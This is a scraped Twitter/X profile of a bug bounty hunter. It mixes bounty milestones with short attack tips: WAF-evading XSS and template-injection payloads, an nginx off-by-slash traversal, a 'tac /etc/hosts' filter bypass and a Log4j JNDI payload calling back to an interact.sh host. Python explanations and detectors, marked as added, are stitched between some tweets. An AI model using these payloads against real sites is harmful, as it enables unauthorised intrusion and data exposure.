Nagli

@galnagli

Followers
34,402
Following
551
Media
390
Statuses
1,453

Hacker, Bug Bounty Hunter - Top 10 All Time @Hacker0x01 , Top 20 @BugCrowd ; Live Hacking Events Winner & Founder of @shockwave_sec - Attack Surface Management

Joined December 2019
Pinned Tweet
@galnagli
Nagli
1 year
The team at @OpenAI just fixed a critical account takeover vulnerability I reported a few hours ago affecting #ChatGPT . It was possible to take over someone's account, view their chat history, and access their billing information without them ever realizing it. Breakdown below 👇
84
725
3K
@galnagli
Nagli
9 months
Today I start a "$50,000 in bounties in 50 days" #BugBounty challenge. I've been super unproductive lately, with an average of 2 hacking hours a week. Will update the thread occasionally with my progress - everyone is welcome to follow aboard, and I'm excited to be back at it.
53
66
1K
@galnagli
Nagli
1 year
Excited to announce that I just hit the $1,000,000 mark in bounties earned on @Hacker0x01 ! It's been an incredible journey traveling around the world to compete and collaborate with the best. Grateful for the opportunity and excited to see what the future holds! #BugBounty
125
68
1K
@galnagli
Nagli
1 month
One of my coolest bugs just got paid! Let's go & Onwards : ) #BugBounty
34
28
1K
@galnagli
Nagli
3 years
Ever find a phpMyAdmin login portal and default creds won't work? Try to access the /phpmyadmin/setup/ endpoint and you might be presented with an authentication-bypassed, configurable admin panel. This got me a nice bounty on @Synack . Ref: #bugbountytips
25
307
984
@galnagli
Nagli
2 years
When fuzzing for SQLi always try "%22" as an injection payload; I just stumbled upon a MariaDB fork that wouldn't show any verbose SQL errors otherwise. ' => 301 " => 301 => 301 with SQL error #bugbountytips
19
239
847
@galnagli
Nagli
3 years
XSS payload to keep in your notes:
<script>alert(1)</script> -> nginx block
"><img src=x onerror=alert(1)> -> Wordfence block
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -> successful execution
#bugbountytips #BugBounty
12
302
743
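The third payload above works because of a decoding mismatch: the filter URL-decodes the parameter once and sees no tag, while the application decodes it a second time before rendering. The following Python is an added example, not code from the tweet or its author; the payload string is a constructed copy of the one above, and the "WAF" is a single regex standing in for a real rule set. The assumed application bug is the second unquote() call.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the double-encoded payload in the tweet above.
PAYLOAD = ("ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529"
           "%253c%252fscript%253ey6uu6")

# Simplified stand-in for a WAF signature; real rule sets are far larger.
SCRIPT_TAG = re.compile(r"<\s*script[^>]*>", re.IGNORECASE)


def waf_view(raw: str) -> str:
    """What a filter that URL-decodes the input exactly once inspects."""
    return unquote(raw)


def app_view(raw: str) -> str:
    """What an application that decodes the value a second time renders.

    The second unquote() is the assumed bug: one decode belongs to the web
    server, the other to the application's own parameter handling.
    """
    return unquote(unquote(raw))


def decode_fully(raw: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing (bounded), which is what a
    filter must do if it wants to inspect what the application will see."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def waf_blocks(raw: str) -> bool:
    """Single-decode filter verdict."""
    return SCRIPT_TAG.search(waf_view(raw)) is not None


def app_executes(raw: str) -> bool:
    """Whether the double-decoding application ends up with a script tag."""
    return SCRIPT_TAG.search(app_view(raw)) is not None


def hardened_waf_blocks(raw: str) -> bool:
    """Filter verdict after decoding to a fixpoint."""
    return SCRIPT_TAG.search(decode_fully(raw)) is not None


if __name__ == "__main__":
    print("filter sees      :", waf_view(PAYLOAD))
    print("application sees :", app_view(PAYLOAD))
    print("single-decode filter blocks:", waf_blocks(PAYLOAD))
    print("double-decoding app executes:", app_executes(PAYLOAD))
    print("fixpoint-decode filter blocks:", hardened_waf_blocks(PAYLOAD))
```

Decoding to a fixpoint on the filter side only narrows the gap; the real fix is for the application to decode a parameter exactly once and to output-encode it where it is rendered.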
@galnagli
Nagli
2 years
Yay, me and @m0chan98 got awarded a $64,400 bounty on @Hacker0x01 ! #BugBounty #TogetherWeHitHarder
32
29
726
@galnagli
Nagli
2 years
How to effectively study and get better doing #BugBounty
A. Create a private Github Repository
B. Start a clean
C. Keep up with Hacktivity / Twitter / Youtube
D. Write notes (Without copy-pasting)
I'm doing it for over 2 years and the ROI is amazing.
16
150
688
@galnagli
Nagli
4 months
The damage of VDP programs and their incentivization is far greater than giving some hunters "points" for farming non-bugs that they can later boast on their CVs. I believe it might actually ruin Bug Bounty platforms in the near future. Let's explore the facts 📜 So VDP's, as
66
164
675
@galnagli
Nagli
3 years
Stumble upon 404 nginx servers? Make sure to test for off-by-slash vulnerabilities:
http://example[.]com/index.php -> File not found
http://example[.]com/assets../index.php -> source code
Try with img, js, assets, vendors, media as the folder name #bugbountytips #BugBounty
6
288
664
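The off-by-slash bug comes from an nginx location prefix without a trailing slash combined with an alias directive: nginx swaps the matched prefix for the alias directory and appends the rest of the URI verbatim, so "/assets../index.php" becomes "/app/static/../index.php". The Python below is an added example (not from the tweet or its author) that emulates that substitution with posixpath so the vulnerable and the corrected config can be compared offline; the paths /app/static/ and /app are assumed for illustration.

```python
import posixpath

# Folder names the tweet suggests trying, plus the file to reach.
CANDIDATE_FOLDERS = ("img", "js", "assets", "vendors", "media")


def alias_target(location: str, alias: str, uri: str):
    """Emulate nginx `location <prefix> { alias <dir>; }` path mapping.

    nginx replaces the matched location prefix with the alias directory and
    appends the remainder of the URI unchanged. Returns the normalised
    filesystem path, or None when the prefix does not match the request.
    (Real nginx would then try other locations; that is out of scope here.)
    """
    if not uri.startswith(location):
        return None
    mapped = alias + uri[len(location):]
    return posixpath.normpath(mapped)


def escapes_alias(location: str, alias: str, uri: str) -> bool:
    """True when the mapped path lands outside the alias directory."""
    target = alias_target(location, alias, uri)
    if target is None:
        return False
    root = posixpath.normpath(alias)
    return not (target == root or target.startswith(root + "/"))


def candidate_uris(target_file: str = "index.php"):
    """URIs to probe for the off-by-slash pattern, one per folder name."""
    return [f"/{folder}../{target_file}" for folder in CANDIDATE_FOLDERS]


if __name__ == "__main__":
    # Vulnerable: prefix has no trailing slash, alias does.
    vuln = ("/assets", "/app/static/")
    # Fixed: both end with a slash, so "/assets../" never matches the prefix.
    fixed = ("/assets/", "/app/static/")
    for uri in candidate_uris():
        print(uri, "->", alias_target(*vuln, uri), "| escapes:", escapes_alias(*vuln, uri))
    print("fixed config matches /assets../index.php:",
          alias_target(*fixed, "/assets../index.php") is not None)
```

The corrected configuration keeps the trailing slash on both the location prefix and the alias directory (or uses root instead of alias), so the request no longer matches the prefix and falls through to whatever the server does for unknown paths.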
@galnagli
Nagli
2 years
We have successfully managed to replicate and confirm the public PoC for CVE-2022-40684, which grants SSH access without any interaction to vulnerable FortiOS instances, with a CVSS score of 9.6. Nuclei template for scanning can be found here: #BugBounty
6
186
648
@galnagli
Nagli
3 years
Working AWS/Cloudfront #log4j WAF Bypass within the URI path http://hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}} Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload. #BugBounty
12
198
614
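The payload above defeats a literal "${jndi:" signature by hiding the colon and slashes inside Log4j 2 default-value lookups: ${nagli:-:} resolves to ":" because "nagli" is not a known lookup, and ${::-/} resolves to "/". A detection that wants to match what Log4j will actually evaluate has to resolve that syntax first. The Python below is an added example, not code from the tweet or its author, and not Log4j's own implementation: it re-implements the ${name:-default} substitution rules as I understand them, evaluates only the lower and upper lookups offline, turns other plain lookups such as ${hostName} into readable placeholders, and re-emits jndi lookups in canonical form so a regex can match them. It goes slightly beyond the tweet by also handling the ${${lower:j}ndi:...} case-mangling variant.

```python
import re

# The naive signature a WAF might use; it misses the obfuscated form.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _lookup(name: str):
    """Evaluate the lookups we can decide offline; None means 'unknown'.

    Assumption for this example: only lower:/upper: are evaluated. Anything
    else (env:, sys:, date:, ...) is treated as unknown, which is what you
    want in a detector since those values are attacker-independent.
    """
    prefix, sep, key = name.partition(":")
    p = prefix.lower()
    if sep and p == "lower":
        return key.lower()
    if sep and p == "upper":
        return key.upper()
    if p == "jndi":
        # Never evaluate it; re-emit in canonical form for matching.
        return "${" + name + "}"
    return None


def _resolve(body: str) -> str:
    """Resolve one ${...} body whose nested lookups are already resolved."""
    name, sep, default = body.partition(":-")
    value = _lookup(name)
    if value is not None:
        return value
    if sep:                      # ${unknown:-default} -> default
        return default
    return "<" + name + ">"      # ${hostName} etc.: keep a readable placeholder


def normalize(text: str) -> str:
    """Rewrite text the way Log4j 2's string substitution would evaluate it,
    innermost lookups first. Unbalanced braces are left untouched."""
    out, i, n = [], 0, len(text)
    while i < n:
        if not text.startswith("${", i):
            out.append(text[i])
            i += 1
            continue
        depth, j = 1, i + 2
        while j < n and depth:
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
            j += 1
        if depth:                # no matching '}': nothing to evaluate
            out.append(text[i:])
            break
        out.append(_resolve(normalize(text[i + 2:j - 1])))
        i = j
    return "".join(out)


def is_jndi_lookup(text: str) -> bool:
    """Signature match after normalisation."""
    return JNDI.search(normalize(text)) is not None


if __name__ == "__main__":
    # The URI from the tweet above, copied as a constructed sample.
    raw = "http://hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}"
    print("naive signature hits raw payload:", JNDI.search(raw) is not None)
    print("normalised:", normalize(raw))
    print("signature hits normalised payload:", is_jndi_lookup(raw))
```

Running the signature on the normalised string rather than the raw request is the whole point; anything that matches on the raw bytes can be worked around with another layer of ${x:-y}.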
@galnagli
Nagli
1 year
I hacked @redbull and this is what I got 🎁 #BugBounty
20
18
606
@galnagli
Nagli
3 years
Poisoning your Cache for 1000$ - Approach to Exploitation New Blog Post about recent Web Cache Poisoning bug I have found on a Private Bug Bounty Program Going over the approach, exploitation and writing reproducible report. #bugbountytips #BugBounty
14
217
601
@galnagli
Nagli
3 years
Decided to create "BountyTricks" a repo with private modules and bounty related tricks I'll add from time to time, starting with fresh nuclei SSRF module which takes endpoints as input and check's if they are vulnerable to SSRF - in scale #bugbountytips
9
226
591
@galnagli
Nagli
2 months
Just got awarded the prestigious P1 Warrior Belt by @Bugcrowd for submitting over 100 valid critical submissions to companies on their platform, manually and using automation engine. Among the companies that I worked with to remediate critical,
33
14
601
@galnagli
Nagli
9 months
AI helps greatly translating JavaScript to "Human Readable Language", here's how I found a very straight forward DOM Based XSS in 2 minutes. #BugBounty
13
93
571
@galnagli
Nagli
1 year
Just got awarded a $22,000 bounty and joined the exclusive 30,000 reputation club on @Hacker0x01 Not a bad start for the weekend! #BugBounty 🚀😉
34
15
529
@galnagli
Nagli
2 years
Yay, I was awarded a $200 bounty on @Hacker0x01 for Remote Code Execution 🥱 #BugBounty
48
37
512
@galnagli
Nagli
2 years
Top 10 @Hacker0x01 Public Programs to hunt in 2022 (Personal Experience)
1. Zoom
2. Epic Games
3. Github
4. AT&T
5. PayPal
6. Consensys
7. Roblox
8. Yahoo
9. Shopify
10. Flutter UK&I
I'll be happy to vouch or answer questions / hear more thoughts! #bugbountytips
23
78
489
@galnagli
Nagli
3 years
There are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : ) #bugbounty
10
111
461
@galnagli
Nagli
3 years
In November, I submitted 107 vulnerabilities to 55 programs on @Hacker0x01 and 269 vulnerabilities to 17 programs on @Bugcrowd . #BugBounty
24
25
462
@galnagli
Nagli
3 years
New machine for the new year, M1 Max 16 Inch 32GB RAM, maybe now I can start using a certain tool named BurpSuite : ) #BugBounty
25
13
461
@galnagli
Nagli
6 months
Curious about how a $20,000 OAuth bug I discovered at a Live Hacking Event last year looks like? Today you can dive into an exact replica and see for yourself! I've collaborated with @NahamSec & @hackinghub_io to create walkthrough video + demo lab 🧪
4
102
452
@galnagli
Nagli
11 months
Crazy Aliyun WAF Bypass: cat /etc/hosts - triggers WAF tac /etc/hosts - 🧙‍♂️ #bugbountytips #bugbounty
21
81
443
@galnagli
Nagli
3 years
Yay, I was awarded a $12,600 bounty on @Hacker0x01 ! Nice way to end the year with my first 5 digits, next bounty post will be a 6 digit one 🤙 #TogetherWeHitHarder #BugBounty
22
16
436
@galnagli
Nagli
1 year
🚨👁️👁️🚨 En route to Seoul🇰🇷for @Meta 's Live Hacking Event with @0xteknogeek @spaceraccoonsec and @iangcarroll , we already managed to pop some pretty neat findings : ) Looking forward ✈️ #BugBounty
17
14
432
@galnagli
Nagli
2 months
🤝
@galnagli
Nagli
3 months
Enjoying champagne at the Grand Hyatt 🇭🇰 lounge and getting a collaboration invite from @fransrosen on a Sunday? That's what dreams are made of 😅 Looking forward to catching up with folks next week in Poland ✈️ #BugBounty
10
9
218
13
10
431
@galnagli
Nagli
3 years
One liner to mass scan for CookieMonster issues: echo "host" | nuclei -t cookie-extractor.yaml | cut -d "=" -f 2 | cut -d ";" -f 1 > cookies && for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done #bugbountytips
@iangcarroll
Ian Carroll
3 years
Excited to share a small thing I've been working on: fast tooling for detecting misconfigured session implementations in web apps. CookieMonster rapidly finds misconfigured secret keys in applications using Laravel, Flask, JWTs, and more!
9
174
482
3
159
417
@galnagli
Nagli
3 years
Waiting for my train 📨💰 #BugBounty #BugBountyLife #automation
9
18
419
@galnagli
Nagli
2 years
In April, I submitted 173 vulnerabilities to 56 programs on @Hacker0x01 , also managed to sneak for the first time into the Top 3 global monthly leaderboard 🤙 #BugBounty
17
14
402
@galnagli
Nagli
1 year
Less than 48 hours into @OpenAI 's #BugBounty program on @Bugcrowd and already claimed the #1 spot among 1,000+ researchers by reporting 9 valid vulnerabilities! (so far) The program got itself a strong start, and I thought I'd share some interesting insights I've noticed: 1/n
@galnagli
Nagli
1 year
The team at @OpenAI just fixed a critical account takeover vulnerability I reported a few hours ago affecting #ChatGPT . It was possible to take over someone's account, view their chat history, and access their billing information without them ever realizing it. Breakdown below 👇
84
725
3K
10
40
401
@galnagli
Nagli
3 years
Ever find an endpoint which will let you control the contents inside stored <img src> tag? As XSS probably won't be possible, you can insert your burp collaborator and look for any referral leakages on the page (via the URI) Escalated it to 0 interaction ATO. #bugbountytips
19
98
392
@galnagli
Nagli
6 months
Yay, I was awarded $5,000 bounty on @Hacker0x01 with @Rhynorater for PHP Type Juggling! #BugBounty
12
14
388
@galnagli
Nagli
1 year
Super excited to have won the Exterminator award for the second time in a row at @Hacker0x01 's H1-213 Live Hacking Event, while hacking @amazon and achieving another Top-5 finish. Shout-out to @seanmeals and @fransrosen for the great collaboration and good time! #BugBounty
14
21
383
@galnagli
Nagli
3 years
Finding postMessage vulnerabilities has never been easier. Take a look at our first open-source tool from @enso_security , which provides a GUI and a cross-origin traffic inspector with ease. Looking forward to seeing your findings using posta! #bugbountytips
@enso_security
enso.security
3 years
Cross document messaging is a very common communication method. It has been around for a while, Watch Enso’s Chief Architect Chen Gour-Arie and Lior Mazor, Information Security at Amdocs discuss cross-document messaging technology, and how to hack it!
0
22
52
11
146
384
@galnagli
Nagli
3 years
Expand your attack surface by grabbing SSL certificates from IP addresses and matching these with your Bug Bounty targets. I'd recommend running this technique on cloud provider ranges such as AWS/Azure/GCP using cero [CIDR] (cero 0.0.0.0/0) #bugbountytips
5
156
378
@galnagli
Nagli
2 years
Secured 🥇 and 🥈 spots with the folks at @YogoshaOfficial @GISECGlobal Live Hacking Event thankful for the great collaboration 🤝 #BugBounty
14
13
373
@galnagli
Nagli
1 year
I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims. Curious how this happens? 👇 #BugBounty
5
75
378
@galnagli
Nagli
3 years
19
12
373
@galnagli
Nagli
2 years
I am thrilled to announce that as of today, I have been ranked among the top 10 hackers on the all-time global leaderboard of @Hacker0x01 ! 2 years since I've scored my first bounty payout. #BugBounty
23
7
358
@galnagli
Nagli
1 year
I just found a Critical Authentication Bypass on one of my target's Apache Tomcat Instance. -> redirect (NXDOMAIN) -> 401 Basic Auth -> 200 OK #bugbountytips
19
70
363
@galnagli
Nagli
3 years
The new @Grafana CVE-2022-21703, is actually a 1 Click Authentication Bypass and full read SSRF via CSRF, all you need is XSS/TKO on Same site host and the CVSS bumps to 9.3 - Critical. All @Grafana versions are VULNERABLE 🙃 Read more at #BugBounty
6
118
350
@galnagli
Nagli
3 years
In January, I submitted 153 vulnerabilities to 73 programs on @Hacker0x01 and 67 vulnerabilities to 22 programs on @Bugcrowd #BugBounty
16
15
353
@galnagli
Nagli
4 months
Classic, just got scammed by @trondao bug bounty program, they leaked their production () AWS Keys, had access to their secrets, team has fixed in an hour and marked Informative - saying there is no risk.
33
29
350
@galnagli
Nagli
3 years
Found a posting feature on a fairly new subdomain, runs AngularJS 1.7.9 {{ 7 * 7 }} -> 49 {{constructor.constructor('alert(1)')()}} -> Stored XSS Neither HTML payloads nor normal XSS payloads worked; whenever you find an AngularJS instance test for possible CSTIs. #bugbountytips
3
94
351
@galnagli
Nagli
3 years
Excited to finish this year as the 5th hacker in the world for 2021 at @Hacker0x01 ! huge achievement for me which involved consistent grind along hard work, and one that I will cherish for long time. #BugBounty
34
8
349
@galnagli
Nagli
3 years
Following @zseano talk on #NahamCon2021 I have decided to share my already crafted research on the entire Google TLD domains scraped from OSINT sources, everything on the trello board is in GoogleVRP scope. Go crash it! #BugBountyTips #BugBounty
3
118
337
@galnagli
Nagli
2 years
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3 ) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> #BugBounty #BugBountyTips
9
115
343
@galnagli
Nagli
3 years
Sharing some personal news: Starting February I'll be joining @salesforce as Senior Product Security Engineer : )
36
2
342
@galnagli
Nagli
2 years
Super excited to win @Bugcrowd 's BugBash event with @indeed 🙏 Thanks to everyone who took part in this wonderful experience! #VegasBugBash2022
25
3
336
@galnagli
Nagli
4 months
Officially Top 5 All-Time on @Hacker0x01 's Leaderboard following a 10G💰 bounty from a public program 🤠 #BugBounty
15
5
331
@galnagli
Nagli
2 years
Won the Exterminator award for the most critical bug at @Hacker0x01 's H1-407 event teaming up with @spaceraccoonsec and @alxbrsn hacking #EpicGames ! Huge Shoutout to @Rhynorater and @hacker_ for their assistance on the winning bug 🤝 #BugBounty
16
8
321
@galnagli
Nagli
4 years
Happy to share my latest writeup about a Critical Issue I have found on *.samsung.com 👻 Broken Access Control leads to Mass Account Takeover of Samsung employees application accounts #bugbountytips #bugbounty
16
89
319
@galnagli
Nagli
4 years
My #BugBounty2021Goals are:
- $20k in bounties
- 3000 reputation on H1
- Attending a LHE/CON abroad
- 1 valid submission on Facebook and Twitter
- Tools and framework development for automation
#BugBounty
10
6
318
@galnagli
Nagli
3 years
In May, I submitted 56 vulnerabilities to 27 programs on @Hacker0x01 . #TogetherWeHitHarder And, I submitted 260 vulnerabilities to 8 programs on @Bugcrowd #BugBounty
33
17
309
@galnagli
Nagli
3 years
WordPress Plugin Update Confusion - The full guide on how to scan and mitigate the next big supply chain attack #BugBounty
4
120
301
@galnagli
Nagli
2 years
Non-intrusive @pdnuclei template for the Confluence RCE vulnerability CVE-2022-26134 is available. Confirmation of hits by DNS callbacks with nslookup to interactsh servers.
0
74
300
@galnagli
Nagli
2 years
Happy to achieve a major milestone today by crossing 25,000 reputation points on @Hacker0x01 🌪️ #BugBounty
21
2
296
@galnagli
Nagli
2 years
Happy to share some exciting news as I've decided to leave my role at @salesforce in order to pursue my own Application Security B2B Startup @shockwave_sec , which will wrap up my own automation from the last couple of years into a product offering.
28
8
297
@galnagli
Nagli
2 years
Setup is ready for @Bugcrowd 's #BugBash events and I'm already few P1's in 🤙, I'll be in Vegas from the 6th to the 15th for some on-site hacking and collaborations, chilling, poker and hanging out with friends - looking forward to it! 🌴💻
13
7
292
@galnagli
Nagli
4 years
When your blind xss payload executes at the wrong place #BugBounty
22
33
284
@galnagli
Nagli
1 year
Had some fun the last couple of hours🧙🏻‍♂️
19:01 GMT+2 - New Scope Added
20:05 GMT+2 - 4th Critical Submitted
20:07 GMT+2 - New Scope is Out of Scope
00:20 GMT+2 - $8,000 Bounties
#BugBounty
20
7
280
@galnagli
Nagli
4 years
When you find input field which allows " (quotes), try this payload: "autofocus onfocus=alert(1)// -> Doesn't work "type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works #bugbountytips #BugBounty
5
86
274
@galnagli
Nagli
5 months
Excited to finally cross the 40,000 reputation points mark on @HackerOne with 2x $5,000 bounties for RCEs, this time it was directly streamlined from , grateful to see the hard work paying off! #BugBounty
13
8
283
@galnagli
Nagli
1 year
It’s been a blast participating at @Meta ’s Live Hacking Event, super hardened target but happy to score $17,000 with a pretty cool 0-day in collaboration with @spaceraccoonsec @0xteknogeek - Seoul 🇰🇷 is awesome and looking forward to the next challenges! #BugBounty
5
3
276
@galnagli
Nagli
3 years
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Stored XSS through a 3rd party vendor. Soon I'll be releasing my first research paper and slides talk about attacking 3rd parties to score bounties, stay tuned :-) #BugBounty
15
10
267
@galnagli
Nagli
2 years
Touched down at Denver few hours ago after 20 hours trip for #h1303 which is my first @Hacker0x01 In-Person Live Hacking Event. I’ll share the experiences, stuff I’m up to until monday in this long twitter thread, It’s going to be a 🚀 #BugBounty
5
5
267
@galnagli
Nagli
3 years
Decided to drop the new Freshdesk Subdomain TKO PoC. We can takeover any expired Freshdesk subdomain by performing response manipulation on the admin portal, as the CNAME validation is being handled only on the client side. #bugbounty #bugbountytips
13
95
269
@galnagli
Nagli
2 years
Excited to score a Top 5 finish on H1-3493 🙌🏻 Without many expectations this turned out to be my best performance at a @Hacker0x01 Live Hacking Event! Thankful to everyone who took part in this awesome experience #BugBounty
15
0
267
@galnagli
Nagli
3 years
There is lately huge "blind following" to a certain BB personal, it will lead beginners to a wrong path when they opt to start doing Bug Bounties. I made the same mistakes and luckily I surrounded myself with great list of BB hunters, I'll create a nice thread of genuine people.
17
70
265
@galnagli
Nagli
1 year
Celebrating my 25th birthday today reflecting on what has been a fantastic week in Dubai for @GISECGlobal - It’s always great to meet and hang out with awesome hackers and friends around the world 🫡 #BugBounty
22
1
261
@galnagli
Nagli
2 years
Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report. Spinning up a server to host a redirection header is time consuming and not-so-fun to do. There's an easy alternative 🧵
11
62
264
@galnagli
Nagli
4 months
Never thought I'd be hacking @LouisVuitton from their main HQ in the center of Paris, apparently that's what I'm doing today - #BugBounty does take you to crazy places✨ Thanks @yeswehack running a great event! #BugBounty #HMIF2
9
6
266
@galnagli
Nagli
3 years
Happy to sneak into the Top 10 on the 90 days leaderboard at @Hacker0x01 , 0 VDP reputation involved - result of hard work and many invested hours. Today marks exactly 11 months since my first bounty. #BugBounty
26
4
258
@galnagli
Nagli
2 months
The Polyfill[.]io backdoor is wild! from what I read all over on Twitter the person who was in charge of the domain sold it to rogue actors back in February and ever since it served as backdoor to hundreds of thousands major websites that had it referenced within a script tag,
5
58
262
@galnagli
Nagli
2 years
20,000 reputation points club @Hacker0x01 💪.
24
2
259
@galnagli
Nagli
3 years
Thanks for tuning in to my @defcon session and sorry for any possible sound issues. You can find the talk here: SAP NetWeaver Open Redirect: Slides are in the first comment. You can reach out to me for Q&A about the session :)
13
77
261
@galnagli
Nagli
2 years
Don't look for collaboration partners, look for friends to Bug Bounty with. #BugBountyTips
5
16
249
@galnagli
Nagli
2 years
Very sad to know that this “Triager” not only had access to my bugs but also filed CoC escalations against me for no reason, wow!
17
20
248
@galnagli
Nagli
3 years
Thanks @SynackRedTeam for a great event today in Vegas, it was great to meet good pals in person and chat around 👋 Looking forward to @defcon tomorrow #BugBounty
7
6
246
@galnagli
Nagli
3 years
Yay, I was awarded a $2,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder My biggest single bounty payout and it came from @Hacker0x01 's own bug bounty program, surely hard work and dedication pays off. #BugBounty
14
9
243
@galnagli
Nagli
3 years
Took a little #BugBounty vacation to London, important to refresh after a successful period.
10
2
241
@galnagli
Nagli
4 years
Expanding your attack surface with hardcoded APK endpoints sounds like a tough task, but it's simple and rewarding:
1. Install by @delphit33
2. Download the target's APK with a simple Google search
3. apkurlgrep -a target.apk
Win. #bugbountytips #BugBounty
6
118
234
@galnagli
Nagli
2 years
Just scooped a very nice bounty and big kudos to @elastic ’s Bug Bounty Team👌🏻 Submission => Triage => Fix => Bounty in 4 days, definitely a program I’d recommend playing with at @Hacker0x01 #BugBounty
14
5
237
@galnagli
Nagli
2 years
In February, I submitted 193 vulnerabilities to 97 programs on @Hacker0x01 and 68 vulnerabilities to 28 programs on @Bugcrowd . #BugBounty
13
5
233
@galnagli
Nagli
2 years
I have a theory that the amount of people who actually hack full time on a specific public program is < 10 - meaning that there should be ton of bugs out there to find. I’m 100% certain that if anyone would focus on one for 30 days he would get a valid bug. #bugbountytips
10
23
237
@galnagli
Nagli
3 years
Happy to be part of @Hacker0x01 All Time Top 100 Leaderboard 🙏 #BugBounty
15
6
232
@galnagli
Nagli
2 months
The new @Hacker0x01 policy around CVE reports is concerning, especially for High & Critical ones, as it potentially keeps hundreds of their customers vulnerable to critical ransomware-leading risks by withholding information as they are automatically being set as "Informative."
15
23
236
@galnagli
Nagli
2 years
#1 Secret for being a good #BugBounty hunter: create a community of like-minded people to share your progress with. Since June 2021 I've been engaging a few hours on a daily basis with ~50 top tier hackers and we all learn every day, have fun together and earn WAY more bounties.
12
17
224
@galnagli
Nagli
3 years
In October, I submitted 127 vulnerabilities to 78 programs on @Hacker0x01 . #TogetherWeHitHarder #BugBounty
11
5
226
@galnagli
Nagli
3 years
Some VPS advice for new hackers: you will be fine working on single targets with $5 DO boxes. If you want to up your automation game, you'll figure out when is the right time to upgrade. There is 0 logic in renting shared instances or starting out with a stronger setup. #bugbountytips
12
20
221
@galnagli
Nagli
3 years
Happy to reach the 5000 reputation milestone on @Hacker0x01 #BugBounty
21
7
227
@galnagli
Nagli
11 months
Thrilled to scoop another Top 5 finish on @Hacker0x01 ’s H1-813 Live Hacking Event in Tokyo 🇯🇵 targeting @PayPal , earning more than $30,000 in bounties! #BugBounty
5
5
224
@galnagli
Nagli
2 years
This is a small example of how I like to structure my private repo: I have already over 30+ chapters and 20k+ lines, that is the best way I found to consume knowledge and build a private hand-book for bug bounty sessions.
6
63
226
@galnagli
Nagli
3 years
Excited to invite you all to join my @defcon session airing at on 11:00 AM GMT -8. We'll go over some reconnaissance concepts, how to scan for bugs at scale and some practical PoC's with new nuclei templates release. #defcon29 #BugBounty
13
53
224
@galnagli
Nagli
9 months
Team Israel 🇮🇱 finished 2nd on @Hacker0x01 ’s 2023 Ambassador World-cup beating 🇮🇳🇺🇸🇹🇷🇸🇬🇫🇷 along the way! Circumstances were tough but we gave a proper fight - kudos to the team for all the hard work, looking forward to the next one and for better times ahead 🙏 #BugBounty
15
6
222